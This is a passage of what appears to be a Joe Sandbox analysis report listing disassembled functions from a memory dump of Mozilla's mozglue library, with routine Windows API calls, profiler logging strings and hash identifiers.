                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                  • String ID:
                                                                  • API String ID: 922945588-0
                                                                  • Opcode ID: aaa22b5b9b8f3dd9414f3a734db7dc38f27d73c732bf960dd3762ffe3cf5673b
                                                                  • Instruction ID: 68b314f65891e9c8192f4e6fc2a6267564ecce9e236adf1a2a212f4d8161fe25
                                                                  • Opcode Fuzzy Hash: aaa22b5b9b8f3dd9414f3a734db7dc38f27d73c732bf960dd3762ffe3cf5673b
                                                                  • Instruction Fuzzy Hash: 08518C357006018FDB25CF59C4D4A2AB7F6FF89318B59859DE98A97341C731EC02CB82
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6CA01D0F
                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,6CA01BE3,?,?,6CA01D96,00000000), ref: 6CA01D18
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,6CA01BE3,?,?,6CA01D96,00000000), ref: 6CA01D4C
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6CA01DB7
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CA01DC0
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CA01DDA
                                                                    • Part of subcall function 6CA01EF0: GetCurrentThreadId.KERNEL32 ref: 6CA01F03
                                                                    • Part of subcall function 6CA01EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CA01DF2,00000000,00000000), ref: 6CA01F0C
                                                                    • Part of subcall function 6CA01EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CA01F20
                                                                  • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CA01DF4
                                                                    • Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 1880959753-0
                                                                  • Opcode ID: 033aac1d5b908ba041751c49644646febc30e91fc6b966ef57f75bef413e4c48
                                                                  • Instruction ID: e0ca5f84c1c49725f5b3d77e5b1746a1b33326f9e4611947fc41c78d007c4a74
                                                                  • Opcode Fuzzy Hash: 033aac1d5b908ba041751c49644646febc30e91fc6b966ef57f75bef413e4c48
                                                                  • Instruction Fuzzy Hash: 4341AC752007019FCB14DF28D888B96BBF5FF49358F10842EE95A87B41CB31E854CB90
                                                                  APIs
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3E220,?,?,?,?,6C9C3899,?), ref: 6C9C38B2
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3E220,?,?,?,6C9C3899,?), ref: 6C9C38C3
                                                                  • free.MOZGLUE(00000000,?,?,?,6C9C3899,?), ref: 6C9C38F1
                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C9C3920
                                                                  • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C9C3899,?), ref: 6C9C392F
                                                                  • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C9C3899,?), ref: 6C9C3943
                                                                  • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C9C396E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                  • String ID:
                                                                  • API String ID: 3047341122-0
                                                                  • Opcode ID: 188391d20ff204448e78e278284ab46d507f039fd1900ed4893644024096ae67
                                                                  • Instruction ID: b176502277fd3f4cc2b2c835990472214e2a04662a75f88e6bf977999dd64c1a
                                                                  • Opcode Fuzzy Hash: 188391d20ff204448e78e278284ab46d507f039fd1900ed4893644024096ae67
                                                                  • Instruction Fuzzy Hash: E0212172700B20DFE720DF25C880BC6B7A9FF48728F258429D95A97B00C734E885CB92
                                                                  APIs
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F84F3
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F850A
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F851E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F855B
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F856F
                                                                  • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F85AC
                                                                    • Part of subcall function 6C9F7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C9F85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F767F
                                                                    • Part of subcall function 6C9F7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C9F85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F7693
                                                                    • Part of subcall function 6C9F7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C9F85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F76A7
                                                                  • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F85B2
                                                                    • Part of subcall function 6C9D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C9D5EDB
                                                                    • Part of subcall function 6C9D5E90: memset.VCRUNTIME140(6CA17765,000000E5,55CCCCCC), ref: 6C9D5F27
                                                                    • Part of subcall function 6C9D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C9D5FB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                  • String ID:
                                                                  • API String ID: 2666944752-0
                                                                  • Opcode ID: 33e571a49a91989573812f50ff5180085e7d6af6f02b62bbb32ade2e9605a617
                                                                  • Instruction ID: 4e288b035d39b7919b2ba45843d143c81449d0b624c1e00128e54ed9f8ea9f0d
                                                                  • Opcode Fuzzy Hash: 33e571a49a91989573812f50ff5180085e7d6af6f02b62bbb32ade2e9605a617
                                                                  • Instruction Fuzzy Hash: 1621E1752007019FDB18DB25CC88A5A77B8AF8230DF10492CE56BC3B41DB35F84ACB45
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C9C1699
                                                                  • VerSetConditionMask.NTDLL ref: 6C9C16CB
                                                                  • VerSetConditionMask.NTDLL ref: 6C9C16D7
                                                                  • VerSetConditionMask.NTDLL ref: 6C9C16DE
                                                                  • VerSetConditionMask.NTDLL ref: 6C9C16E5
                                                                  • VerSetConditionMask.NTDLL ref: 6C9C16EC
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C9C16F9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                  • String ID:
                                                                  • API String ID: 375572348-0
                                                                  • Opcode ID: ee9c5e97dee574826c934bf3ed52d74967dd9c7dc2b61e4b3d8ae96d4e84aeed
                                                                  • Instruction ID: 9fea01200a05230247e030937dc6103d1b1d964f9c7e828c62e1629c8452a611
                                                                  • Opcode Fuzzy Hash: ee9c5e97dee574826c934bf3ed52d74967dd9c7dc2b61e4b3d8ae96d4e84aeed
                                                                  • Instruction Fuzzy Hash: 8221C0B07403096BEB256A689C99FBAB27CEF96704F048528F6099B180C678DD54C7A6
                                                                  APIs
                                                                    • Part of subcall function 6C9ECBE8: GetCurrentProcess.KERNEL32(?,6C9B31A7), ref: 6C9ECBF1
                                                                    • Part of subcall function 6C9ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9B31A7), ref: 6C9ECBFA
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
                                                                    • Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FF619
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C9FF598), ref: 6C9FF621
                                                                    • Part of subcall function 6C9F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9F94EE
                                                                    • Part of subcall function 6C9F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9F9508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FF637
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8,?,?,00000000,?,6C9FF598), ref: 6C9FF645
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8,?,?,00000000,?,6C9FF598), ref: 6C9FF663
                                                                  Strings
                                                                  • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C9FF62A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                  • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                  • API String ID: 1579816589-753366533
                                                                  • Opcode ID: 42949c4f7219fd165dffdd7ee7305227cf2d911b32ca9ad0a6de9c18f3ee5a80
                                                                  • Instruction ID: af6600f93904d530f67fd4dd4d42e9775ec7d24e4118a56094999ad008069786
                                                                  • Opcode Fuzzy Hash: 42949c4f7219fd165dffdd7ee7305227cf2d911b32ca9ad0a6de9c18f3ee5a80
                                                                  • Instruction Fuzzy Hash: F9110431201716AFCB18AF18DD189E577BAFB9635CB10005AEA19C3F41CB31E817CBA0
                                                                  APIs
                                                                    • Part of subcall function 6C9EAB89: EnterCriticalSection.KERNEL32(6CA3E370,?,?,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB94
                                                                    • Part of subcall function 6C9EAB89: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EABD1
                                                                  • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C9C1FDE
                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C9C1FFD
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C2011
                                                                  • FreeLibrary.KERNEL32 ref: 6C9C2059
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                  • String ID: CoCreateInstance$combase.dll
                                                                  • API String ID: 4190559335-2197658831
                                                                  • Opcode ID: da3f0130ea77be4b19d124eca7b05aee020b3655a4399ed2ec6667a453fe44c9
                                                                  • Instruction ID: cbf5716fc56c015db25cb1f1b72ef2d6d741f4578542954f22a9a30d68ece737
                                                                  • Opcode Fuzzy Hash: da3f0130ea77be4b19d124eca7b05aee020b3655a4399ed2ec6667a453fe44c9
                                                                  • Instruction Fuzzy Hash: F6116A75340706EFDF28DF54DC6AE963B79EB8A359F10806AE909C2640C731D842CB72
                                                                  APIs
                                                                    • Part of subcall function 6C9EAB89: EnterCriticalSection.KERNEL32(6CA3E370,?,?,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB94
                                                                    • Part of subcall function 6C9EAB89: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EABD1
                                                                  • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C9ED9F0,00000000), ref: 6C9C0F1D
                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C9C0F3C
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C0F50
                                                                  • FreeLibrary.KERNEL32(?,6C9ED9F0,00000000), ref: 6C9C0F86
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                  • String ID: CoInitializeEx$combase.dll
                                                                  • API String ID: 4190559335-2063391169
                                                                  • Opcode ID: dab3917559d4faff1f57f9576c2bf16130dea2ee84b9acadce07e0c02c49ef07
                                                                  • Instruction ID: b0f2fff5039fd4f75c75b4f15ef23079607e357b182daeab0627c800dd6b4dc2
                                                                  • Opcode Fuzzy Hash: dab3917559d4faff1f57f9576c2bf16130dea2ee84b9acadce07e0c02c49ef07
                                                                  • Instruction Fuzzy Hash: 9011C1B1701342ABDF28DF58EE28E453778FB8A326F00825DE90DC2680D730D442CA72
                                                                  APIs
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
                                                                    • Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FF559
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9FF561
                                                                    • Part of subcall function 6C9F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9F94EE
                                                                    • Part of subcall function 6C9F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9F9508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FF577
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FF585
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FF5A3
                                                                  Strings
                                                                  • [I %d/%d] profiler_resume, xrefs: 6C9FF239
                                                                  • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C9FF56A
                                                                  • [I %d/%d] profiler_pause_sampling, xrefs: 6C9FF3A8
                                                                  • [I %d/%d] profiler_resume_sampling, xrefs: 6C9FF499
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                  • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                  • API String ID: 2848912005-2840072211
                                                                  • Opcode ID: 5543e17482a8724f8786c6b7c6f3424cb0024bd9bd7c732a0b70e27f0a1b6d9f
                                                                  • Instruction ID: e310f5d9607a2e1cfe0abbcb435e946f85e0ababdfe2a1cbb8c27f6f3c1b3666
                                                                  • Opcode Fuzzy Hash: 5543e17482a8724f8786c6b7c6f3424cb0024bd9bd7c732a0b70e27f0a1b6d9f
                                                                  • Instruction Fuzzy Hash: 39F024722003119FDB146F28AC28AAA77BEEB9629DF108015FA0DC3302CB31C803CB60
                                                                  APIs
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
                                                                    • Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
                                                                    • Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FF619
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C9FF598), ref: 6C9FF621
                                                                    • Part of subcall function 6C9F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9F94EE
                                                                    • Part of subcall function 6C9F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9F9508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FF637
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8,?,?,00000000,?,6C9FF598), ref: 6C9FF645
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8,?,?,00000000,?,6C9FF598), ref: 6C9FF663
                                                                  Strings
                                                                  • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C9FF62A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                  • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                  • API String ID: 2848912005-753366533
                                                                  • Opcode ID: fa8a13792bb94641989e5ef86024b19bd7d4848540c3e598651094165ed08d7d
                                                                  • Instruction ID: e0568f237974557386a83dea4368af03d16ff4504ffbacc97c5d4b30a9f8f7ad
                                                                  • Opcode Fuzzy Hash: fa8a13792bb94641989e5ef86024b19bd7d4848540c3e598651094165ed08d7d
                                                                  • Instruction Fuzzy Hash: 91F02471200315AFDB142F289C28A9A77BEEB962ADF108055FA4DC3342CB318C03CB70
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(kernel32.dll,6C9C0DF8), ref: 6C9C0E82
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C9C0EA1
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C0EB5
                                                                  • FreeLibrary.KERNEL32 ref: 6C9C0EC5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                  • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                  • API String ID: 391052410-1680159014
                                                                  • Opcode ID: 3cbc10841c1b93740320acf0d710f25bd61e6ae94ef969a8b3810054ef660105
                                                                  • Instruction ID: 715e29703a32e6a1cd736d4ed5b0fba538e20af4c21e4faee7f05b20d05d81bd
                                                                  • Opcode Fuzzy Hash: 3cbc10841c1b93740320acf0d710f25bd61e6ae94ef969a8b3810054ef660105
                                                                  • Instruction Fuzzy Hash: 870178B07503968BDB289FA8DD38A4237B6F706314F1492A9D90CC3B80DB30E4468A17
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C9ECFAE,?,?,?,6C9B31A7), ref: 6C9F05FB
                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C9ECFAE,?,?,?,6C9B31A7), ref: 6C9F0616
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C9B31A7), ref: 6C9F061C
                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C9B31A7), ref: 6C9F0627
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: _writestrlen
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                  • API String ID: 2723441310-2186867486
                                                                  • Opcode ID: cd26725152fb9fa08f5ce60c86cb37bb62f3371e8ccc4ffd2b22fbacba210a45
                                                                  • Instruction ID: 1c5bb711486e31eecc1a645df7bb1cb1777061fd537fa478c07a1bb270f2f211
                                                                  • Opcode Fuzzy Hash: cd26725152fb9fa08f5ce60c86cb37bb62f3371e8ccc4ffd2b22fbacba210a45
                                                                  • Instruction Fuzzy Hash: 19E08CE2A0116037F614225ABC86DBBB65CDBC6238F080139FD0D83301E94EED1E51F6
                                                                  Memory Dump Source
